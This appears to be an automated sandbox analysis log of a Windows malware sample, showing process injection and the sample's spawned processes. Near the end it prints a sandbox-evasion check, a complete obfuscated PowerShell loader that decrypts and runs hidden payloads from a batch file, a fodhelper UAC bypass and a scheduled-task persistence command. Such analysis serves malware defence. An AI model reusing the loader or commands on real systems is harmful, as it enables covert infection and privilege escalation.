        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 690000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: F20000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: F30000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: BB0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1010000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 13F0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 600000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: E80000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 540000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: D90000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: C10000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1450000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: D60000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: C10000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1100000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: C70000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: B00000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 7B0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 11B0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 720000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 740000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: D00000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1350000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 9C0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 11D0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 700000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 840000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1190000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 960000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 9F0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 500000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: BE0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: E30000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 13C0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: CA0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1460000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 750000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 6C0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1130000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: A10000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 7C0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1250000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1170000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: C20000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 7D0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 9D0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 510000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 620000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: C40000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 590000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 510000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1C0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: CF0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: F60000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 7E0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 13B0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 13F0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: E40000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 3C0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 700000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1150000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: DF0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1050000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: BC0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1420000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 9A0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: DC0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 9D0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: E00000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1230000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: CF0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 590000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1090000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: ED0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: CA0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 3B0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1040000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: AD0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: BD0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 700000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 730000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1220000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 9F0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: FA0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1330000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 780000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 280C22F0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1E1FB970000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 25EE91B0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1AD31C90000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 226AD1B0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 138D43C0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 236C6DC0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: CD0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 15829E70000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1D643A60000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1CDEB370000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 22F41AD0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 20631820000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 19C5BA20000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1DE98F00000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1CCE3640000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1858EA10000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 228C25A0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 2942EBE0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 23D96450000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1C8A0380000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 26D9F390000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1E5EF030000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 248D2920000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 21C0EE50000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1E43B8A0000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1E43BA00000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 165EDA50000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 201B5250000
        Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 201B5250000
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\b.bat" "
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeProcess created: C:\Users\user\AppData\Local\Temp\paint.exe "C:\Users\user\AppData\Local\Temp\paint.exe"
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeProcess created: C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exe "C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exe"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function elgju($CRcTF){ $KmeGB=[System.Security.Cryptography.Aes]::Create(); $KmeGB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $KmeGB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $KmeGB.Key=[System.Convert]::FromBase64String('yXhq0Zci7Ki7oYmTRrbYbju3J/i3HBqGk5Zcg1aE0Uo='); $KmeGB.IV=[System.Convert]::FromBase64String('WdcPQiNwNN818it8sRh8xg=='); $TgPAd=$KmeGB.CreateDecryptor(); $dQIvJ=$TgPAd.TransformFinalBlock($CRcTF, 0, $CRcTF.Length); $TgPAd.Dispose(); $KmeGB.Dispose(); $dQIvJ;}function VIxdo($CRcTF){ Invoke-Expression '$VBZuZ=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$CRcTF);'.Replace('blck', ''); Invoke-Expression '$sdANW=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IHCXJ=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($VBZuZ, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IHCXJ.CopyTo($sdANW); $IHCXJ.Dispose(); $VBZuZ.Dispose(); $sdANW.Dispose(); $sdANW.ToArray();}function gYUmc($CRcTF,$tscxF){ Invoke-Expression '$jaygU=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$CRcTF);'.Replace('blck', ''); Invoke-Expression '$aZTCr=$jaygU.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$aZTCr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $tscxF)blck;'.Replace('blck', '');}$DuTVY = 
'C:\Users\user\AppData\Local\Temp\b.bat';$host.UI.RawUI.WindowTitle = $DuTVY;$FQcuc=[System.IO.File]::ReadAllText($DuTVY).Split([Environment]::NewLine);foreach ($BcNGU in $FQcuc) { if ($BcNGU.StartsWith(':: ')) { $sDcLn=$BcNGU.Substring(3); break; }}$fKndv=[string[]]$sDcLn.Split('\');Invoke-Expression '$pcpOF=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[0])));'.Replace('blck', '');Invoke-Expression '$TAQWK=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[1])));'.Replace('blck', '');gYUmc $pcpOF (,[string[]] (''));gYUmc $TAQWK (,[string[]] (''));
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
        Source: C:\Users\user\AppData\Local\Temp\paint.exeProcess created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\paint.exe"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe C:\Windows\System32\fodhelper.exe
        Source: C:\Windows\System32\fodhelper.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe"
        Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe"
